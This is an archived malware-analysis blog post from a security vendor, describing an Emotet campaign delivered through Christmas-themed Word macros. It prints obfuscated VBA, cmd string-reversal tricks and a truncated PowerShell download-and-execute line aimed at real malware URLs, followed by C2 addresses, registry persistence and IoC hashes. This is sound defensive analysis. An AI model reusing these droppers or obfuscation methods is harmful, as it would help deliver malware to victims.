{
	"id": "11f31bc3-fb6c-4a7c-a748-644521329c44",
	"created_at": "2026-04-06T00:15:46.897102Z",
	"updated_at": "2026-04-10T03:21:59.36244Z",
	"deleted_at": null,
	"sha1_hash": "a8d99f4ff74abc22fb68d9fdc5550c5309c0f22c",
	"title": "The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 459328,
	"plain_text": "The Christmas Card you never wanted - A new wave of Emotet is\r\nback to wreak havoc\r\nBy Suleyman Ozarslan, PhD\r\nPublished: 2018-12-21 · Archived: 2026-04-05 21:03:04 UTC\r\nCybercriminals routinely exploit the holiday season to boost malware delivery, and themed lures are a proven way\r\nto drive clicks. We observed malicious documents that use festive filenames such as ChristmasCard.doc,\r\nChristmas-Greeting-Card.doc, Christmas-wishes.doc, and Christmas-Congratulation.doc. These files arrive\r\nthrough phishing emails or downloads that look like harmless greetings. Once opened, the documents attempt to\r\nfetch and execute a second stage payload in the background.\r\nOur analysis shows these droppers retrieve Emotet, a modular banking trojan that now functions primarily as a\r\nhigh volume downloader and loader for additional malware. After initial execution, Emotet establishes\r\npersistence, communicates with command and control, and can deliver follow-on payloads such as credential\r\nstealers and other banking trojans. The result is broader compromise that impacts government entities and\r\norganizations across both the private and public sectors, particularly during busy holiday periods when security\r\nteams are stretched and users are more likely to engage with seasonal content.\r\nInitial Access\r\nThe specific sample analyzed below is the ChristmasCard.doc (SHA256:\r\n1D751C9AA079CC2D42D07D7964D5FAE375127EFA6CA1AC2DFECFD481FE796FBC).\r\nWhen a victim opens the document, Microsoft Word asks to enable/disable macros. It reveals that a macro is\r\nembedded in the document.\r\nWhen a user opens the document, it claims that it was created in an earlier version of Microsoft Office and asks\r\nthe victim to enable the content, which launches the code hidden in the macros.\r\nhttps://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html\r\nPage 1 of 7\n\nExecution\r\nVBA (Visual Basic for Applications) codes in the embedded macro are given below:\r\n Function EiDJKjLt()\r\n On Error Resume Next\r\n kRZXpYi = Array(TXwzCHKXZ, WiFKpY, NTNqBN, Interaction.Shell(CleanString(nvTFDMcQuDSt\r\n Select Case vhWrwwLHwhINhj\r\n Case 21458470\r\n vtPEXawqKYqTzo = 205771406\r\n bJOUowYROCUnaEvkFGjfFijV = Oct(fhaIrJIBLlXViMzUwpUGL + CStr(FcGOrIzszdsmIRwIX + Log(2\r\n MsgBox (bJOUowYROCUnaEvkFGjfFijV)\r\n End Select\r\n End Function\r\n \r\nThe macro includes obfuscated VBA codes to evade security controls. The most interesting part of the macro is:\r\n Interaction.Shell(CleanString(nvTFDMcQuDSt.TextBox1), 15 - 15)\r\n \r\nIn this malicious macro, Interaction.Shell method runs an executable program written in TextBox1. However,\r\nTextBox1 is not seen by the victim, it is hidden in the document. We used the Debug.Print method to see the\r\ncontent of the Textbox1, and accessed the following code that is executed by the Interaction.Shell method:\r\n c:\\SzCTnucwEfW\\SbuaBlErrzYpl\\RdPspAGt\\..\\..\\..\\windows\\system32\\cmd.exe /c %ProgramData\r\n \r\nWe see a heavily obfuscated code to make detection difficult, the only clear part of the code is\r\nc:\\SzCTnucwEfW\\SbuaBlErrzYpl\\RdPspAGt\\..\\..\\..\\windows\\system32\\cmd.exe. As seen on this part of the code,\r\nthree random directories are added after c:\\ to bypass weak security controls, then three \\.. are added to traverse\r\nback to c:\\. Therefore, the obtained path is c:\\windows\\system32\\cmd.exe that runs the subsequent commands.\r\nHowever, those commands are also obfuscated:\r\nhttps://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html\r\nPage 2 of 7\n\n\"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel\r\n \r\nThe second and third commands are interesting:\r\nfor /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!\u0026\u0026if %V==0 call %xJWn:~6%\"\r\n \r\nBriefly, these commands print 497 characters long XhOY variable in reverse order.\r\nLet’s look at XhOY variable:\r\n'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=i\r\nAnd, XhOY variable in reverse order:\r\npowershell $KSv='\\DfV'\\;$ohl=new-object Net.WebClient;$lIY='\\http://www.ideenweberei.com/L9NXvhd@http\r\nNow, we can see it is a PowerShell command, but it is obfuscated by using variable substitution and garbage\r\nvariable assignments. Even so, we can reveal the following command by removing the garbage variables, and\r\nputting the values of the variables where they exist.\r\npowershell foreach($wFR in http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@htt\r\nBriefly, this command tries to download 150.exe from the following addresses in given order via the\r\nNet.WebClient.DownloadFile method. Then, if the file is downloaded successfully it executes the downloaded file\r\nby using the Invoke-Item cmdlet, and exits the loop. It differentiates a successful file download by comparing the\r\nlength of the file with -ge 80000 (ge: greater or equal than).\r\n http://www.ideenweberei.com/L9NXvhd\r\n http://www.capbangkok.com/p1SolwJv\r\n http://www.trinityriveroutfitters.com/W4CGsWIzI\r\n http://www.hayashitoysmart.com/add_favorites/XJJSoydNv\r\n http://cleeft.nl/60ILq1CgH\r\n \r\nWhen we started to examine the 150.exe file (SHA256:\r\n5456471B260E664E9485D2CB8321D8E3B3033F700A5BDAAFC94E4BA8046FB87D), we realized that it is\r\nthe infamous Emotet trojan.\r\nAs expected from an Emotet sample, it tries to download a file from the following locations:\r\nhttps://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html\r\nPage 3 of 7\n\n213.120.119.231:8443\r\n 78.189.21.131:80\r\n 187.140.90.91:8080\r\n 81.150.17.158:50000\r\n 1.150.17.158:8443\r\n 201.190.150.60:443\r\n \r\nAfter a few failed attempts, it downloaded archivesymbol.exe (SHA256:\r\n5DA7A92311FDA255EFAC52C6BFEBCED31BD584453F6BB4F8DE6CDD1B2505B00F) file from\r\n201.190.150.60:443 to C:\\Users\\admin\\AppData\\Local\\archivesymbol\\ folder. Emotet artifacts usually mimic the\r\nnames of known executables. In order to become persistent on the victim system, Archivesymbol.exe adds its full\r\npath to the HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run key in the Registry.\r\nConclusion\r\nIn this wave of attacks, Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed\r\nWord document, which contains a macro that executes a PowerShell script to download a malicious payload.\r\nCommands in the macro are heavily obfuscated for defense evasion.\r\nWith the Email Threat Simulation (ETS) Module, Picus customers are able to test their network and client security\r\nsystems' blocking performance against any malicious email, without waiting for infected by malware such as\r\nEmotet.\r\nIn addition, using the Picus Endpoint Simulation Module (ESM), you can challenge your endpoint security\r\ncontrols against a wide range of threats, from basic attacks to Advanced Persistent Threats (APTs), with up-to-date\r\nattack techniques mapped to MITRE’s ATT\u0026CK framework.\r\nAs a conclusion, you can continuously verify and improve your security measures by utilizing the most practical,\r\nquick-to-apply, and immediate mitigation actions provided by Picus.\r\nIf you want to know how your enterprise security devices are blocking these attacks, you can contact us at\r\ndemo@picussecurity.com. Within a few hours, we can quickly report to you how your network security systems\r\nprotect against Emotet and other current cyber attacks!\r\nProcess Graph\r\nMITRE’s ATT\u0026CK Techniques Observed\r\nhttps://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html\r\nPage 4 of 7\n\nInitial Access Execution Persistence Defense Evasion Discovery\r\nCommand\r\nand Control\r\nT1193\r\nSpearphishing\r\nAttachment\r\nT1059\r\nCommand-Line\r\nInterface\r\nT1060\r\nRegistry Run\r\nKeys /\r\nStartup\r\nFolder\r\nT1140\r\nDeobfuscate/Decode\r\nFiles or Information\r\nT1012\r\nQuery\r\nRegistry\r\nT1071\r\nStandard\r\nApplication\r\nLayer Protocol\r\nT1192\r\nSpearphishing\r\nLink\r\nT1086\r\nPowerShell\r\nT1050 New\r\nService\r\nT1112 Modify\r\nRegistry\r\nT1082\r\nSystem\r\nInformation\r\nDiscovery\r\nT1065\r\nUncommonly\r\nUsed Port\r\n \r\n1035\r\nService\r\nExecution\r\n   \r\nT1057\r\nProcess\r\nDiscovery\r\n \r\n \r\nT1106\r\nExecution\r\nthrough API\r\n   \r\nT1010\r\nApplication\r\nWindow\r\nDiscovery\r\n \r\n \r\nT1137\r\nOffice\r\nApplication\r\nStartup\r\n       \r\n \r\nT1064\r\nScripting\r\n       \r\nIndicator of Compromises (IoC)\r\nDelivery Documents\r\n 1D751C9AA079CC2D42D07D7964D5FAE375127EFA6CA1AC2DFECFD481FE796FBC\r\n 216C7C9300632A99D808AC6C2BA26A53402AC584504BB7EAC3CBE35B56994D93\r\n 2563D86BB358D86D06856A5BECDCAD5B6461D88FDD49E362691D5DFAE43C4625\r\n 3B0609646D8FFC097DFEEFF7FC70A52B38C4AE53D93DE6FB96A1B1119E51DB4F\r\n 3C18597017EF58FEE97F8B28879DABEEC6DAE7A968A56A891D07D1DC52DDC3AF\r\n 4030D19135210C191D7761A432B295314588519A0D3497BEA401F6488C7DE445\r\n 69caceab49fdcf349e2862d18ed39ed586d4e1a973f2ffda9904808871f6bce1\r\n 81F1052A4D972B33990ACD682B38182AC89AE812BD2C3A0E195BA0384AA53753\r\n A62F9B138B9EF335233E2F25C1682A516632671334A969FDC15C32558CB6FD5C\r\nhttps://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html\r\nPage 5 of 7\n\nB9DCFF12869697646C0A62241CC211ED49D683324BA09663FCFD4EAD8F1C3807\r\n C216A2A1E9F88F8889125D88D1875B1BB333D73A5F3DF9F63D238C5396594D06\r\n D1A6784D0318BC92859A33AE5C4EA6F593DEB148DE4599D1DD14CFE807589E55\r\n D97FD77F52628A1094C41E44E3781E81DA279039DE436CF313DBADE61FA1CD24\r\n DC6C630936D718D02D1D3D8C71DA9847AB6FD9E79DC8695C5662793255F441B1\r\n DDCCAD5FD03A3C620AABFFFE8B8464E8B2BEAF94954282D285E3850B0578DFA4\r\n F4D9C1E45849B189548F2FCB45126B008CFA6254CFE2FABB789EC0F096672ECA\r\n F93B39B2723F9F0AC2DFE978FE284FA887CCF7C9BFB5FD9428C59025F56C5E86\r\n \r\nDropped Emotet Trojans\r\n 2E63942BF12B6FBB3F8A48716E5D97079E4DF668C9181D9A66651CBA873D2A17\r\n 53B07540383F3D8AB47DC8966D2ABCDD5885F1D5D2D0E1D2E5046F90EABDE3F6\r\n 5456471B260E664E9485D2CB8321D8E3B3033F700A5BDAAFC94E4BA8046FB87D\r\n 7ADDCF66ED2376C8F9B2ADAEFF04FC01C92881B2990D460EEFD60324209BD62C\r\n 890B9B288AA2C2183DA044232C2B750B83565741464E1938FD53444EB0929F18\r\n 928CC4AED8F8ABF2863F49142DCF4EE4BEE558E21161ED0296A32216EAA256D1\r\n BFACADEFD24B4DC2ED4A1E928200C938A8608D24EDF651DB7A210972135FB149\r\n E01516FEDFA82C82FB25F812AE106E4F4591B3191812B7FD93A0944731F335BA\r\n EE2699909F938CD5A35535FA372C36E88163D9C3971283ADAA6F7EF0CD8A2795\r\n F020910684E6B806586131E30692FFE070442A0288D67FF85E6506B97B86B6AB\r\n FF27CB0A4046B7D4E23F007D65CDC52B06F41EE2DF99AB1133ED8A36862E4A21\r\n \r\n \r\nURLs\r\n hxxp://63.143.67.107:20/\r\n hxxp://78.189.21.131/\r\n hxxp://81.150.17.158:8443/\r\n hxxp://187.140.90.91:8080/\r\n hxxp://198.61.196.18:8080/\r\n hxxp://201.190.150.60:443/\r\n hxxp://210.2.86.72:8080/\r\n hxxp://213.120.119.231:8443/\r\n hxxp://bod-karonconsulting.com/ZhsjepZP/\r\n hxxp://www.countdown2chaos.com/RteZ6CxTl3/\r\n hxxp://fortifi.com/IQmS1zuNj\r\n hxxp://www.ideenweberei.com/L9NXvhd/\r\n hxxp://kliksys.com/yuZ6yAFq/\r\n hxxp://limaxbatteries.com/yc8jyNd/\r\n hxxp://strike3productions.com/fHXdHseo0/\r\n hxxp://www.mtyfurnishing.com/uV0Z7WiM/\r\n hxxp://www.omegaserbia.com/1rDAPTYEgE/\r\nhttps://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html\r\nPage 6 of 7\n\nhxxp://www.wmdcustoms.com/SoYuALGOUR/\r\n \r\n \r\nConnected IPs\r\n 63.143.67.107\r\n 70.55.69.202\r\n 72.5.53.5\r\n 75.119.205.247\r\n 78.189.21.131\r\n 81.150.17.158\r\n 103.4.235.152\r\n 148.66.137.40\r\n 181.197.253.133\r\n 181.57.97.83\r\n 181.60.57.250\r\n 187.140.90.91\r\n 188.166.101.236\r\n 189.222.20.165\r\n 190.195.129.227\r\n 195.208.1.119\r\n 198.61.196.18\r\n 201.190.150.60\r\n 209.95.55.249\r\n 210.2.86.72\r\n 213.120.119.231\r\n 216.120.247.90\r\n \r\nSource: https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html\r\nhttps://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html"
	],
	"report_names": [
		"the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434546,
	"ts_updated_at": 1775791319,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a8d99f4ff74abc22fb68d9fdc5550c5309c0f22c.pdf",
		"text": "https://archive.orkl.eu/a8d99f4ff74abc22fb68d9fdc5550c5309c0f22c.txt",
		"img": "https://archive.orkl.eu/a8d99f4ff74abc22fb68d9fdc5550c5309c0f22c.jpg"
	}
}